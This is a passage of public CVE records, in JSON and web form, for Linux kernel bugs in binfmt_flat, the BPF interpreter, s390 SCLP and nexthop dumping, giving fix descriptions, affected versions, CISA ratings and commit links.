          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinfmt_flat: Fix corruption when not offsetting data start\n\nCommit 04d82a6d0881 (\"binfmt_flat: allow not offsetting data start\")\nintroduced a RISC-V specific variant of the FLAT format which does\nnot allocate any space for the (obsolete) array of shared library\npointers. However, it did not disable the code which initializes the\narray, resulting in the corruption of sizeof(long) bytes before the DATA\nsegment, generally the end of the TEXT segment.\n\nIntroduce MAX_SHARED_LIBS_UPDATE which depends on the state of\nCONFIG_BINFMT_FLAT_NO_DATA_START_OFFSET to guard the initialization of\nthe shared library pointer region so that it will only be initialized\nif space is reserved for it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:29:56.829Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3a684499261d0f7ed5ee72793025c88c2276809c"
        },
        {
          "url": "https://git.kernel.org/stable/c/af65d5383854cc3f172a7d0843b628758bf462c8"
        },
        {
          "url": "https://git.kernel.org/stable/c/49df34d2b7da9e57c839555a2f7877291ce45ad1"
        },
        {
          "url": "https://git.kernel.org/stable/c/9350ba06ee61db392c486716ac68ecc20e030f7c"
        },
        {
          "url": "https://git.kernel.org/stable/c/3eb3cd5992f7a0c37edc8d05b4c38c98758d8671"
        }
      ],
      "title": "binfmt_flat: Fix corruption when not offsetting data start",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44966",
    "datePublished": "2024-09-04T18:38:45.625Z",
    "dateReserved": "2024-08-21T05:34:56.667Z",
    "dateUpdated": "2025-11-03T22:14:13.583Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42063 (GCVE-0-2024-42063)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:52 – Updated: 2026-01-05 10:51

Title

bpf: Mark bpf prog stack with kmsan_unposion_memory in interpreter mode

Summary

In the Linux kernel, the following vulnerability has been resolved: bpf: Mark bpf prog stack with kmsan_unposion_memory in interpreter mode syzbot reported uninit memory usages during map_{lookup,delete}_elem. ========== BUG: KMSAN: uninit-value in __dev_map_lookup_elem kernel/bpf/devmap.c:441 [inline] BUG: KMSAN: uninit-value in dev_map_lookup_elem+0xf3/0x170 kernel/bpf/devmap.c:796 __dev_map_lookup_elem kernel/bpf/devmap.c:441 [inline] dev_map_lookup_elem+0xf3/0x170 kernel/bpf/devmap.c:796 ____bpf_map_lookup_elem kernel/bpf/helpers.c:42 [inline] bpf_map_lookup_elem+0x5c/0x80 kernel/bpf/helpers.c:38 ___bpf_prog_run+0x13fe/0xe0f0 kernel/bpf/core.c:1997 __bpf_prog_run256+0xb5/0xe0 kernel/bpf/core.c:2237 ========== The reproducer should be in the interpreter mode. The C reproducer is trying to run the following bpf prog: 0: (18) r0 = 0x0 2: (18) r1 = map[id:49] 4: (b7) r8 = 16777216 5: (7b) *(u64 *)(r10 -8) = r8 6: (bf) r2 = r10 7: (07) r2 += -229 ^^^^^^^^^^ 8: (b7) r3 = 8 9: (b7) r4 = 0 10: (85) call dev_map_lookup_elem#1543472 11: (95) exit It is due to the "void *key" (r2) passed to the helper. bpf allows uninit stack memory access for bpf prog with the right privileges. This patch uses kmsan_unpoison_memory() to mark the stack as initialized. This should address different syzbot reports on the uninit "void *key" argument during map_{lookup,delete}_elem.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b30f3197a6cd08005…
	https://git.kernel.org/stable/c/d812ae6e02bd6e6a9…
	https://git.kernel.org/stable/c/3189983c26108cf09…
	https://git.kernel.org/stable/c/e8742081db7d01f98…

Impacted products

Vendor

Product

Version

Linux

Affected: bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8 , < b30f3197a6cd080052d5d4973f9a6b479fd9fff5 (git)
Affected: bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8 , < d812ae6e02bd6e6a9cd1fdb09519c2f33e875faf (git)
Affected: bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8 , < 3189983c26108cf0990e5c46856dc9feb9470d12 (git)
Affected: bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8 , < e8742081db7d01f980c6161ae1e8a1dbc1e30979 (git)

Linux

Affected: 3.15
Unaffected: 0 , < 3.15 (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:03.937Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b30f3197a6cd080052d5d4973f9a6b479fd9fff5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d812ae6e02bd6e6a9cd1fdb09519c2f33e875faf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3189983c26108cf0990e5c46856dc9feb9470d12"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e8742081db7d01f980c6161ae1e8a1dbc1e30979"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42063",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:20:09.278781Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:08.514Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b30f3197a6cd080052d5d4973f9a6b479fd9fff5",
              "status": "affected",
              "version": "bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8",
              "versionType": "git"
            },
            {
              "lessThan": "d812ae6e02bd6e6a9cd1fdb09519c2f33e875faf",
              "status": "affected",
              "version": "bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8",
              "versionType": "git"
            },
            {
              "lessThan": "3189983c26108cf0990e5c46856dc9feb9470d12",
              "status": "affected",
              "version": "bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8",
              "versionType": "git"
            },
            {
              "lessThan": "e8742081db7d01f980c6161ae1e8a1dbc1e30979",
              "status": "affected",
              "version": "bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "kernel/bpf/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.15"
            },
            {
              "lessThan": "3.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Mark bpf prog stack with kmsan_unposion_memory in interpreter mode\n\nsyzbot reported uninit memory usages during map_{lookup,delete}_elem.\n\n==========\nBUG: KMSAN: uninit-value in __dev_map_lookup_elem kernel/bpf/devmap.c:441 [inline]\nBUG: KMSAN: uninit-value in dev_map_lookup_elem+0xf3/0x170 kernel/bpf/devmap.c:796\n__dev_map_lookup_elem kernel/bpf/devmap.c:441 [inline]\ndev_map_lookup_elem+0xf3/0x170 kernel/bpf/devmap.c:796\n____bpf_map_lookup_elem kernel/bpf/helpers.c:42 [inline]\nbpf_map_lookup_elem+0x5c/0x80 kernel/bpf/helpers.c:38\n___bpf_prog_run+0x13fe/0xe0f0 kernel/bpf/core.c:1997\n__bpf_prog_run256+0xb5/0xe0 kernel/bpf/core.c:2237\n==========\n\nThe reproducer should be in the interpreter mode.\n\nThe C reproducer is trying to run the following bpf prog:\n\n    0: (18) r0 = 0x0\n    2: (18) r1 = map[id:49]\n    4: (b7) r8 = 16777216\n    5: (7b) *(u64 *)(r10 -8) = r8\n    6: (bf) r2 = r10\n    7: (07) r2 += -229\n            ^^^^^^^^^^\n\n    8: (b7) r3 = 8\n    9: (b7) r4 = 0\n   10: (85) call dev_map_lookup_elem#1543472\n   11: (95) exit\n\nIt is due to the \"void *key\" (r2) passed to the helper. bpf allows uninit\nstack memory access for bpf prog with the right privileges. This patch\nuses kmsan_unpoison_memory() to mark the stack as initialized.\n\nThis should address different syzbot reports on the uninit \"void *key\"\nargument during map_{lookup,delete}_elem."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:51:28.884Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b30f3197a6cd080052d5d4973f9a6b479fd9fff5"
        },
        {
          "url": "https://git.kernel.org/stable/c/d812ae6e02bd6e6a9cd1fdb09519c2f33e875faf"
        },
        {
          "url": "https://git.kernel.org/stable/c/3189983c26108cf0990e5c46856dc9feb9470d12"
        },
        {
          "url": "https://git.kernel.org/stable/c/e8742081db7d01f980c6161ae1e8a1dbc1e30979"
        }
      ],
      "title": "bpf: Mark bpf prog stack with kmsan_unposion_memory in interpreter mode",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42063",
    "datePublished": "2024-07-29T15:52:28.533Z",
    "dateReserved": "2024-07-29T15:50:41.166Z",
    "dateUpdated": "2026-01-05T10:51:28.884Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-44969 (GCVE-0-2024-44969)

Vulnerability from cvelistv5 – Published: 2024-09-04 18:56 – Updated: 2026-01-05 10:52

Title

s390/sclp: Prevent release of buffer in I/O

Summary

In the Linux kernel, the following vulnerability has been resolved: s390/sclp: Prevent release of buffer in I/O When a task waiting for completion of a Store Data operation is interrupted, an attempt is made to halt this operation. If this attempt fails due to a hardware or firmware problem, there is a chance that the SCLP facility might store data into buffers referenced by the original operation at a later time. Handle this situation by not releasing the referenced data buffers if the halt attempt fails. For current use cases, this might result in a leak of few pages of memory in case of a rare hardware/firmware malfunction.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7a7e60ed23d471a07…
	https://git.kernel.org/stable/c/1ec5ea9e25f582fd6…
	https://git.kernel.org/stable/c/a3e52a4c22c846858…
	https://git.kernel.org/stable/c/a88a49473c94ccfd8…
	https://git.kernel.org/stable/c/46f67233b011385d5…
	https://git.kernel.org/stable/c/1e8b7fb427af6b2dd…
	https://git.kernel.org/stable/c/2429ea3b4330e3653…
	https://git.kernel.org/stable/c/bf365071ea92b9579…

Impacted products

Vendor

Product

Version

Linux

Affected: 66aec647216f129b8560dba738303a8486481c53 , < 7a7e60ed23d471a07dbbe72565d2992ee8244bbe (git)
Affected: 66aec647216f129b8560dba738303a8486481c53 , < 1ec5ea9e25f582fd6999393e2f2c3bf56f234e05 (git)
Affected: 66aec647216f129b8560dba738303a8486481c53 , < a3e52a4c22c846858a6875e1c280030a3849e148 (git)
Affected: 66aec647216f129b8560dba738303a8486481c53 , < a88a49473c94ccfd8dce1e766aacf3c627278463 (git)
Affected: 66aec647216f129b8560dba738303a8486481c53 , < 46f67233b011385d53cf14d272431755de3a7c79 (git)
Affected: 66aec647216f129b8560dba738303a8486481c53 , < 1e8b7fb427af6b2ddd54eff66a6b428a81c96633 (git)
Affected: 66aec647216f129b8560dba738303a8486481c53 , < 2429ea3b4330e3653b72b210a0d5f2a717359506 (git)
Affected: 66aec647216f129b8560dba738303a8486481c53 , < bf365071ea92b9579d5a272679b74052a5643e35 (git)

Linux

Affected: 4.17
Unaffected: 0 , < 4.17 (semver)
Unaffected: 4.19.320 , ≤ 4.19.* (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.105 , ≤ 6.1.* (semver)
Unaffected: 6.6.46 , ≤ 6.6.* (semver)
Unaffected: 6.10.5 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44969",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:39:20.994607Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:34.916Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:19.696Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/char/sclp_sd.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7a7e60ed23d471a07dbbe72565d2992ee8244bbe",
              "status": "affected",
              "version": "66aec647216f129b8560dba738303a8486481c53",
              "versionType": "git"
            },
            {
              "lessThan": "1ec5ea9e25f582fd6999393e2f2c3bf56f234e05",
              "status": "affected",
              "version": "66aec647216f129b8560dba738303a8486481c53",
              "versionType": "git"
            },
            {
              "lessThan": "a3e52a4c22c846858a6875e1c280030a3849e148",
              "status": "affected",
              "version": "66aec647216f129b8560dba738303a8486481c53",
              "versionType": "git"
            },
            {
              "lessThan": "a88a49473c94ccfd8dce1e766aacf3c627278463",
              "status": "affected",
              "version": "66aec647216f129b8560dba738303a8486481c53",
              "versionType": "git"
            },
            {
              "lessThan": "46f67233b011385d53cf14d272431755de3a7c79",
              "status": "affected",
              "version": "66aec647216f129b8560dba738303a8486481c53",
              "versionType": "git"
            },
            {
              "lessThan": "1e8b7fb427af6b2ddd54eff66a6b428a81c96633",
              "status": "affected",
              "version": "66aec647216f129b8560dba738303a8486481c53",
              "versionType": "git"
            },
            {
              "lessThan": "2429ea3b4330e3653b72b210a0d5f2a717359506",
              "status": "affected",
              "version": "66aec647216f129b8560dba738303a8486481c53",
              "versionType": "git"
            },
            {
              "lessThan": "bf365071ea92b9579d5a272679b74052a5643e35",
              "status": "affected",
              "version": "66aec647216f129b8560dba738303a8486481c53",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/char/sclp_sd.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.17"
            },
            {
              "lessThan": "4.17",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.320",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.105",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.46",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.320",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.105",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.46",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.5",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/sclp: Prevent release of buffer in I/O\n\nWhen a task waiting for completion of a Store Data operation is\ninterrupted, an attempt is made to halt this operation. If this attempt\nfails due to a hardware or firmware problem, there is a chance that the\nSCLP facility might store data into buffers referenced by the original\noperation at a later time.\n\nHandle this situation by not releasing the referenced data buffers if\nthe halt attempt fails. For current use cases, this might result in a\nleak of few pages of memory in case of a rare hardware/firmware\nmalfunction."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:52:45.467Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7a7e60ed23d471a07dbbe72565d2992ee8244bbe"
        },
        {
          "url": "https://git.kernel.org/stable/c/1ec5ea9e25f582fd6999393e2f2c3bf56f234e05"
        },
        {
          "url": "https://git.kernel.org/stable/c/a3e52a4c22c846858a6875e1c280030a3849e148"
        },
        {
          "url": "https://git.kernel.org/stable/c/a88a49473c94ccfd8dce1e766aacf3c627278463"
        },
        {
          "url": "https://git.kernel.org/stable/c/46f67233b011385d53cf14d272431755de3a7c79"
        },
        {
          "url": "https://git.kernel.org/stable/c/1e8b7fb427af6b2ddd54eff66a6b428a81c96633"
        },
        {
          "url": "https://git.kernel.org/stable/c/2429ea3b4330e3653b72b210a0d5f2a717359506"
        },
        {
          "url": "https://git.kernel.org/stable/c/bf365071ea92b9579d5a272679b74052a5643e35"
        }
      ],
      "title": "s390/sclp: Prevent release of buffer in I/O",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44969",
    "datePublished": "2024-09-04T18:56:46.160Z",
    "dateReserved": "2024-08-21T05:34:56.667Z",
    "dateUpdated": "2026-01-05T10:52:45.467Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42283 (GCVE-0-2024-42283)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:08 – Updated: 2025-11-03 22:03

Title

net: nexthop: Initialize all fields in dumped nexthops

Summary

In the Linux kernel, the following vulnerability has been resolved: net: nexthop: Initialize all fields in dumped nexthops struct nexthop_grp contains two reserved fields that are not initialized by nla_put_nh_group(), and carry garbage. This can be observed e.g. with strace (edited for clarity): # ip nexthop add id 1 dev lo # ip nexthop add id 101 group 1 # strace -e recvmsg ip nexthop get id 101 ... recvmsg(... [{nla_len=12, nla_type=NHA_GROUP}, [{id=1, weight=0, resvd1=0x69, resvd2=0x67}]] ...) = 52 The fields are reserved and therefore not currently used. But as they are, they leak kernel memory, and the fact they are not just zero complicates repurposing of the fields for new ends. Initialize the full structure.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/fd06cb4a5fc7bda3d…
	https://git.kernel.org/stable/c/5cc4d71dda2dd4f15…
	https://git.kernel.org/stable/c/9e8f558a3afe99ce5…
	https://git.kernel.org/stable/c/1377de719652d868f…
	https://git.kernel.org/stable/c/7704460acd7f5d35e…
	https://git.kernel.org/stable/c/a13d3864b76ac8708…
	https://git.kernel.org/stable/c/6d745cd0e9720282c…

Impacted products

Vendor

Product

Version

Linux

Affected: 430a049190de3c9e219f43084de9f1122da04570 , < fd06cb4a5fc7bda3dea31712618a62af72a1c6cb (git)
Affected: 430a049190de3c9e219f43084de9f1122da04570 , < 5cc4d71dda2dd4f1520f40e634a527022e48ccd8 (git)
Affected: 430a049190de3c9e219f43084de9f1122da04570 , < 9e8f558a3afe99ce51a642ce0d3637ddc2b5d5d0 (git)
Affected: 430a049190de3c9e219f43084de9f1122da04570 , < 1377de719652d868f5317ba8398b7e74c5f0430b (git)
Affected: 430a049190de3c9e219f43084de9f1122da04570 , < 7704460acd7f5d35eb07c52500987dc9b95313fb (git)
Affected: 430a049190de3c9e219f43084de9f1122da04570 , < a13d3864b76ac87085ec530b2ff8e37482a63a96 (git)
Affected: 430a049190de3c9e219f43084de9f1122da04570 , < 6d745cd0e9720282cd291d36b9db528aea18add2 (git)

Linux

Affected: 5.3
Unaffected: 0 , < 5.3 (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42283",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:11:29.775671Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:05.278Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:03:26.190Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/nexthop.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "fd06cb4a5fc7bda3dea31712618a62af72a1c6cb",
              "status": "affected",
              "version": "430a049190de3c9e219f43084de9f1122da04570",
              "versionType": "git"
            },
            {
              "lessThan": "5cc4d71dda2dd4f1520f40e634a527022e48ccd8",
              "status": "affected",
              "version": "430a049190de3c9e219f43084de9f1122da04570",
              "versionType": "git"
            },
            {
              "lessThan": "9e8f558a3afe99ce51a642ce0d3637ddc2b5d5d0",
              "status": "affected",
              "version": "430a049190de3c9e219f43084de9f1122da04570",
              "versionType": "git"
            },
            {
              "lessThan": "1377de719652d868f5317ba8398b7e74c5f0430b",
              "status": "affected",
              "version": "430a049190de3c9e219f43084de9f1122da04570",
              "versionType": "git"
            },
            {
              "lessThan": "7704460acd7f5d35eb07c52500987dc9b95313fb",
              "status": "affected",
              "version": "430a049190de3c9e219f43084de9f1122da04570",
              "versionType": "git"
            },
            {
              "lessThan": "a13d3864b76ac87085ec530b2ff8e37482a63a96",
              "status": "affected",
              "version": "430a049190de3c9e219f43084de9f1122da04570",
              "versionType": "git"
            },
            {
              "lessThan": "6d745cd0e9720282cd291d36b9db528aea18add2",
              "status": "affected",
              "version": "430a049190de3c9e219f43084de9f1122da04570",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/nexthop.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.3"
            },
            {
              "lessThan": "5.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.3",
                  "vulnerable": true
                },
                {
